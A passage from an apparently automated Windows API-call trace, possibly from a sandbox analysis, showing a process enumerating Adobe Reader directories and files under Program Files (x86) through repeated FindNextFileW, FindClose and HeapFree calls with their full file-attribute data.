ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7511354, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe7511354, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0173.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.262] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33b7f536, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe2d82cf7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xe2d82cf7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Reader", cAlternateFileName="")) returned 1 [0173.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.264] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632d245, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe2a87d43, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xe2a87d43, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ENU", cAlternateFileName="")) returned 0 [0173.264] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0173.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.264] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b985900, ftCreationTime.dwHighDateTime=0x1d367c3, ftLastAccessTime.dwLowDateTime=0xe2d5caac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x3b985900, ftLastWriteTime.dwHighDateTime=0x1d367c3, nFileSizeHigh=0x0, nFileSizeLow=0x465f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroBroker.exe", cAlternateFileName="ACROBR~1.EXE")) returned 1 [0173.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.265] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcce1de00, ftCreationTime.dwHighDateTime=0x1d36777, ftLastAccessTime.dwLowDateTime=0xdaaadbf3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xcce1de00, ftLastWriteTime.dwHighDateTime=0x1d36777, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="natives_blob.bin", cAlternateFileName="NATIVE~1.BIN")) returned 1 [0173.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.265] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1758800, ftCreationTime.dwHighDateTime=0x1d28954, ftLastAccessTime.dwLowDateTime=0x1abe0524, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe1758800, ftLastWriteTime.dwHighDateTime=0x1d28954, nFileSizeHigh=0x0, nFileSizeLow=0x134b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrofx32.dll", cAlternateFileName="")) returned 1 [0173.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.266] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d58500, ftCreationTime.dwHighDateTime=0x1d06041, ftLastAccessTime.dwLowDateTime=0x37a46528, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb3d58500, ftLastWriteTime.dwHighDateTime=0x1d06041, nFileSizeHigh=0x0, nFileSizeLow=0x152a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="arh.exe", cAlternateFileName="")) returned 1 [0173.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.266] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18d7a4f3, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xdaa61867, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xdaa61867, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WCChromeExtn", cAlternateFileName="WCCHRO~1")) returned 0 [0173.266] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0173.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.267] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b985900, ftCreationTime.dwHighDateTime=0x1d367c3, ftLastAccessTime.dwLowDateTime=0xdec3e62f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x3b985900, ftLastWriteTime.dwHighDateTime=0x1d367c3, nFileSizeHigh=0x0, nFileSizeLow=0x35200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ccme_asym.dll", cAlternateFileName="CCME_A~1.DLL")) returned 1 [0173.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.311] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3626e649, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x3626e649, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x362948a6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ENU", cAlternateFileName="")) returned 0 [0173.311] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0173.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.311] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b83e876, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0x1b83e876, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0x1b83e876, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Javascripts", cAlternateFileName="JAVASC~1")) returned 1 [0173.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.758] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b985900, ftCreationTime.dwHighDateTime=0x1d367c3, ftLastAccessTime.dwLowDateTime=0xdf981782, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x3b985900, ftLastWriteTime.dwHighDateTime=0x1d367c3, nFileSizeHigh=0x0, nFileSizeLow=0xbc1f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JP2KLib.dll", cAlternateFileName="")) returned 1 [0173.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.759] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x362483dd, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x362483dd, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x362483dd, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ENU", cAlternateFileName="")) returned 0 [0173.759] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0173.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.759] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33cfcd37, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x33cfcd37, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x33cfcd37, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Locale", cAlternateFileName="")) returned 1 [0173.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.759] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33cfcd37, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x33cfcd37, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x389c5d29, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en_US", cAlternateFileName="")) returned 0 [0173.759] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0173.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.759] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2a6b500, ftCreationTime.dwHighDateTime=0x1d28954, ftLastAccessTime.dwLowDateTime=0x1fa1b97a, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe2a6b500, ftLastWriteTime.dwHighDateTime=0x1d28954, nFileSizeHigh=0x0, nFileSizeLow=0x62050, dwReserved0=0x0, dwReserved1=0x0, cFileName="logsession.dll", cAlternateFileName="LOGSES~1.DLL")) returned 1 [0173.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0173.760] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x342cca47, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x342cca47, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x342f2cdf, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PMP", cAlternateFileName="")) returned 0 [0173.760] FindClose (in: hFindFile=0x727b08 | out: hFindFile=0x727b08) returned 1 [0173.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.760] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b985900, ftCreationTime.dwHighDateTime=0x1d367c3, ftLastAccessTime.dwLowDateTime=0xe024c29f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x3b985900, ftLastWriteTime.dwHighDateTime=0x1d367c3, nFileSizeHigh=0x0, nFileSizeLow=0xcb0e63, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="AcroForm.api", cAlternateFileName="")) returned 1 [0173.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0173.761] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d58500, ftCreationTime.dwHighDateTime=0x1d06041, ftLastAccessTime.dwLowDateTime=0x389535d8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb3d58500, ftLastWriteTime.dwHighDateTime=0x1d06041, nFileSizeHigh=0x0, nFileSizeLow=0x1b772, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Words.pdf", cAlternateFileName="")) returned 1 [0173.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0173.761] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x389535d8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x38979854, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x38979854, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stamps", cAlternateFileName="")) returned 0 [0173.761] FindClose (in: hFindFile=0x7275c8 | out: hFindFile=0x7275c8) returned 1 [0173.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.761] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b985900, ftCreationTime.dwHighDateTime=0x1d367c3, ftLastAccessTime.dwLowDateTime=0xdfdd3bd7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x3b985900, ftLastWriteTime.dwHighDateTime=0x1d367c3, nFileSizeHigh=0x0, nFileSizeLow=0x71bc63, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Annots.api", cAlternateFileName="")) returned 1 [0173.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0173.762] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3425a337, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x1bbd210b, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0x1bbd210b, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MPP", cAlternateFileName="")) returned 0 [0173.762] FindClose (in: hFindFile=0x7275c8 | out: hFindFile=0x7275c8) returned 1 [0173.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.762] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b985900, ftCreationTime.dwHighDateTime=0x1d367c3, ftLastAccessTime.dwLowDateTime=0xdfc5641f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x3b985900, ftLastWriteTime.dwHighDateTime=0x1d367c3, nFileSizeHigh=0x0, nFileSizeLow=0x179063, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Multimedia.api", cAlternateFileName="MULTIM~1.API")) returned 1 [0173.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.763] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b985900, ftCreationTime.dwHighDateTime=0x1d367c3, ftLastAccessTime.dwLowDateTime=0xe05dfab0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x3b985900, ftLastWriteTime.dwHighDateTime=0x1d367c3, nFileSizeHigh=0x0, nFileSizeLow=0x6edc63, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PPKLite.api", cAlternateFileName="")) returned 1 [0173.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.763] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34102da0, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xdfc09f77, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xdfc09f77, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plug_ins3d", cAlternateFileName="PLUG_I~1")) returned 1 [0173.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0173.764] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b985900, ftCreationTime.dwHighDateTime=0x1d367c3, ftLastAccessTime.dwLowDateTime=0xdfbe3d1f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x3b985900, ftLastWriteTime.dwHighDateTime=0x1d367c3, nFileSizeHigh=0x0, nFileSizeLow=0x2437f0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="prcr.x3d", cAlternateFileName="")) returned 1 [0173.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.764] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3d58500, ftCreationTime.dwHighDateTime=0x1d06041, ftLastAccessTime.dwLowDateTime=0x37adee54, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb3d58500, ftLastWriteTime.dwHighDateTime=0x1d06041, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="pmd.cer", cAlternateFileName="")) returned 1 [0173.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.767] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19218da3, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0x19218da3, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0x19218da3, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UIThemes", cAlternateFileName="")) returned 1 [0173.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.768] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb506b200, ftCreationTime.dwHighDateTime=0x1d06041, ftLastAccessTime.dwLowDateTime=0x37b050b7, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb506b200, ftLastWriteTime.dwHighDateTime=0x1d06041, nFileSizeHigh=0x0, nFileSizeLow=0x42a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ViewerPS.dll", cAlternateFileName="")) returned 1 [0174.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.013] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3674adb, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3674adb, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3674adb, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="libs", cAlternateFileName="")) returned 1 [0174.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.013] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3674adb, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3674adb, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3674adb, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="libs", cAlternateFileName="")) returned 0 [0174.013] FindClose (in: hFindFile=0x727a48 | out: hFindFile=0x727a48) returned 1 [0174.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.013] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3674adb, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3674adb, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x369ad2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dev", cAlternateFileName="")) returned 0 [0174.019] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0174.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0174.020] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="core", cAlternateFileName="")) returned 1 [0174.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.020] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="libs", cAlternateFileName="")) returned 1 [0174.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.020] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="libs", cAlternateFileName="")) returned 0 [0174.020] FindClose (in: hFindFile=0x7276c8 | out: hFindFile=0x7276c8) returned 1 [0174.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.020] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3415d2d, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3415d2d, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3415d2d, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dev", cAlternateFileName="")) returned 0 [0174.020] FindClose (in: hFindFile=0x727588 | out: hFindFile=0x727588) returned 1 [0174.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.020] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3674adb, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3674adb, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3674adb, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="files", cAlternateFileName="")) returned 1 [0174.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.021] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3674adb, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x3674adb, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x3674adb, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="libs", cAlternateFileName="")) returned 1 [0174.021] HeapFree 